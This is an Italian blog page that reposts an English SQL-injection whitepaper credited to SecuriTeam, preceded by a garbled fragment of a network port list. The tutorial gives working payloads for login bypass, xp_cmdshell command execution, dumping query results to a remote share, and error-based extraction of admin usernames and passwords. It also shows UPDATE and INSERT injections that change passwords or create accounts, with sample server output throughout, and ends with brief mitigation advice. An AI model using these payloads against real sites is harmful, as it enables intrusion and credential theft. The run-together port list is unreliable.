dlswpn 2067/udp Data Link Switch Write Port Number
ats 2201/tcp Advanced Training System Program
ats 2201/udp Advanced Training System Program
rtsserv 2500/tcp Resource Tracking system server
rtsserv 2500/udp Resource Tracking system server
rtsclient 2501/tcp Resource Tracking system client
rtsclient 2501/udp Resource Tracking system client
hp-3000-telnet 2564/tcp HP 3000 NS/VT block mode telnet
www-dev 2784/tcp world wide web - development
www-dev 2784/udp world wide web - developmentNSWS
3049/tcp
NSWS 3049/udpccmail 3264/tcp cc:mail/lotus
ccmail 3264/udp cc:mail/lotusdec-notes
3333/tcp DEC Notes
dec-notes 3333/udp DEC Notes
mapper-nodemgr 3984/tcp MAPPER network node manager
mapper-nodemgr 3984/udp MAPPER network node manager
mapper-mapethd 3985/tcp MAPPER TCP/IP server
mapper-mapethd 3985/udp MAPPER TCP/IP server
mapper-ws_ethd 3986/tcp MAPPER workstation server
mapper-ws_ethd 3986/udp MAPPER workstation server
bmap 3421/tcp Bull Apprise portmapper
bmap 3421/udp Bull Apprise portmapper
udt_os 3900/tcp Unidata UDT OS
udt_os 3900/udp Unidata UDT OS
nuts_dem 4132/tcp NUTS Daemonnuts_dem
4132/udp NUTS Daemon
nuts_bootp 4133/tcp NUTS Bootp Server
nuts_bootp 4133/udp NUTS Bootp Server
unicall 4343/tcp UNICALL
unicall 4343/udp UNICALL
krb524 4444/tcp KRB524krb524
4444/udp KRB524
rfa 4672/tcp remote file access server
rfa 4672/udp remote file access servercommplex-main
5000/tcp
commplex-main 5000/udpcommplex-link 5001/tcpcommplex-link
5001/udp
rfe 5002/tcp radio free ethernet
rfe 5002/udp radio free ethernet
telelpathstart 5010/tcp TelepathStarttelelpathstart
5010/udp TelepathStart
telelpathattack 5011/tcp TelepathAttack
telelpathattack 5011/udp TelepathAttack
mmcc 5050/tcp multimedia conference control tool
mmcc 5050/udp multimedia conference control tool
rmonitor_secure 5145/tcprmonitor_secure 5145/udp
aol 5190/tcp America-Online
aol 5190/udp America-Online
padl2sim 5236/udphacl-hb
5300/tcp # HA cluster heartbeat
hacl-hb 5300/udp # HA cluster heartbeat
hacl-gs 5301/tcp # HA cluster general services
hacl-gs 5301/udp # HA cluster general services
hacl-cfg 5302/tcp # HA cluster configuration
hacl-cfg 5302/udp # HA cluster configuration
hacl-probe 5303/tcp # HA cluster probing
hacl-probe 5303/udp # HA cluster probinghacl-local
5304/tcp
hacl-local 5304/udphacl-test
5305/tcphacl-test
5305/udp
x11 6000-6063/tcp X Window System
x11 6000-6063/udp X Window System
sub-process 6111/tcp HP SoftBench Sub-Process Control
sub-process 6111/udp HP SoftBench Sub-Process Control
meta-corp 6141/tcp Meta Corporation License Manager
meta-corp 6141/udp Meta Corporation License Manager
aspentec-lm 6142/tcp Aspen Technology License Manager
aspentec-lm 6142/udp Aspen Technology License Manager
watershed-lm 6143/tcp Watershed License Manager
watershed-lm 6143/udp Watershed License Manager
statsci1-lm 6144/tcp StatSci License Manager - 1
statsci1-lm 6144/udp StatSci License Manager - 1
statsci2-lm 6145/tcp StatSci License Manager - 2
statsci2-lm 6145/udp StatSci License Manager - 2
lonewolf-lm 6146/tcp Lone Wolf Systems License Manager
lonewolf-lm 6146/udp Lone Wolf Systems License Manager
montage-lm 6147/tcp Montage License Manager
montage-lm 6147/udp Montage License Manager
xdsxdm 6558/udpxdsxdm 6558/tcp
afs3-fileserver 7000/tcp file server itself
afs3-fileserver 7000/udp file server itself
afs3-callback 7001/tcp callbacks to cache managers
afs3-callback 7001/udp callbacks to cache managers
afs3-prserver 7002/tcp users & groups database
afs3-prserver 7002/udp users & groups database
afs3-vlserver 7003/tcp volume location database
afs3-vlserver 7003/udp volume location database
afs3-kaserver 7004/tcp AFS/Kerberos authentication service
afs3-kaserver 7004/udp AFS/Kerberos authentication service
afs3-volser 7005/tcp volume managment server
afs3-volser 7005/udp volume managment server
afs3-errors 7006/tcp error interpretation service
afs3-errors 7006/udp error interpretation service
afs3-bos 7007/tcp basic overseer process
afs3-bos 7007/udp basic overseer process
afs3-update 7008/tcp server-to-server updater
afs3-update 7008/udp server-to-server updater
afs3-rmtsys 7009/tcp remote cache manager service
afs3-rmtsys 7009/udp remote cache manager service
ups-onlinet 7010/tcp onlinet uninterruptable power supplies
ups-onlinet 7010/udp onlinet uninterruptable power supplies
font-service 7100/tcp X Font Service
font-service 7100/udp X Font Service
fodms 7200/tcp FODMS FLIPfodms
7200/udp FODMS FLIP
man 9535/tcpman
9535/udpisode-dua
17007/tcp
isode-dua 17007/udp

***

Questo whitepaper è stato preso da www.securyteam.com ed è stato scritto da SK , secondo me è stato fatto in maniera eccezionale veramente , è completo e soprattutto non è che il primo di una serie veramente rara da reperire.

Un grande ringraziamento quindi va a SK , a securyteam.com , e a VulnerabilityAssestament.com per questo stupendo whitepaper che è , lo voglio ricordare , solo il primo di una serie eccellente.

buona lettura,

brigante~

sqlinjection.jpg

SQL-Injection pt.I

whitepaper by SK from http://www.securiteam.com

1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the “9.0 Where can I get more info?” for people who truly deserve credit for developing many techniques in SQL injection.

1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for “FORM” tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).

2.1 What if you can’t find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi’ or 1=1–

Into login, or password, or even in the URL. Example:
– Login: hi’ or 1=1–
– Pass: hi’ or 1=1–
http://duck/index.asp?id=hi&#8217; or 1=1–

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value=”hi’ or 1=1–“>
</FORM>

If luck is on your side, you will get login without any login name or password.

3.1 But why ‘ or 1=1–?
Let us look at another example why ‘ or 1=1– is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, ‘category’ is the variable name, and ‘food’ is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request(“category”)
sqlstr=”SELECT * FROM product WHERE PCategory='” & v_cat & “‘”
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory=’food’

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, ‘food’.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food&#8217; or 1=1–

Now, our variable v_cat equals to “food’ or 1=1– “, if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory=’food’ or 1=1–‘

The query now should now select everything from the product table regardless if PCategory is equal to ‘food’ or not. A double dash “–” tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote (‘). Sometimes, it may be possible to replace double dash with single hash “#”.

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

‘ or ‘a’=’a

The SQL query will now become:

SELECT * FROM product WHERE PCategory=’food’ or ‘a’=’a’

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’=’a
” or “a”=”a
‘) or (‘a’=’a

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

‘; exec master..xp_cmdshell ‘ping 10.10.1.2’–

Try using double quote (“) if single quote (‘) is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:

‘; EXEC master..sp_makewebtask “\\10.10.1.3\share\output.html”, “SELECT * FROM INFORMATION_SCHEMA.TABLES”

But the target IP must folder “share” sharing for Everyone.

6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer ’10’ with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1’ to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is “table1”.

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (‘table1’)–

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%25login%25’–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin_login’ to a column of data type int.
/index.asp, line 5

The matching patent, ‘%25login%25’ will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, “admin_login”.

6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_id’ to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’)–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_name’ to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. “password”, “details”. We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’,’login_name’,’password’,details’)–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let’s get the first login_name from the “admin_login” table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘neo’ to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of “neo”. Finally, to get the password of “neo” from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘m4trix’ to a column of data type int.
/index.asp, line 5

We can now login as “neo” with his password “m4trix”.

6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of “trinity” which is “31173”:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’–

We will probably get a “Page Not Found” error. The reason being, the password “31173” will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’–

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for ‘+’ = 0x2b). We will append ‘(space)morpheus’ into the actual password. Therefore, even if we have a numeric string ‘31173’, it will become ‘31173 morpheus’. By manually calling the convert() function, trying to convert ‘31173 morpheus’ into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘31173 morpheus’ to a column of data type int.
/index.asp, line 5

Now, you can even login as ‘trinity’ with the password ‘31173’.

7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for “neo”:

http://duck/index.asp?id=10; UPDATE ‘admin_login’ SET ‘password’ = ‘newpas5′ WHERE login_name=’neo’–

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO ‘admin_login’ (‘login_id’, ‘login_name’, ‘password’, ‘details’) VALUES (666,’neo2′,’newpas5′,’NA’)–

We can now login as “neo2” with the password of “newpas5”.

8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
– Input from users
– Parameters from URL
– Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change “Startup and run SQL Server” using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

******************************

thank’s very much to all securiteam http://www.securiteam.com/

2 commenti

  1. please qlkuno ke konoska bn backtrack 3 mi aggiunga su msn brigante~ se ci 6!!!!!
    eliodarkdream-@-hotmail.it

  2. […] /inf0 – [IT] […]


Comments RSS TrackBack Identifier URI

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...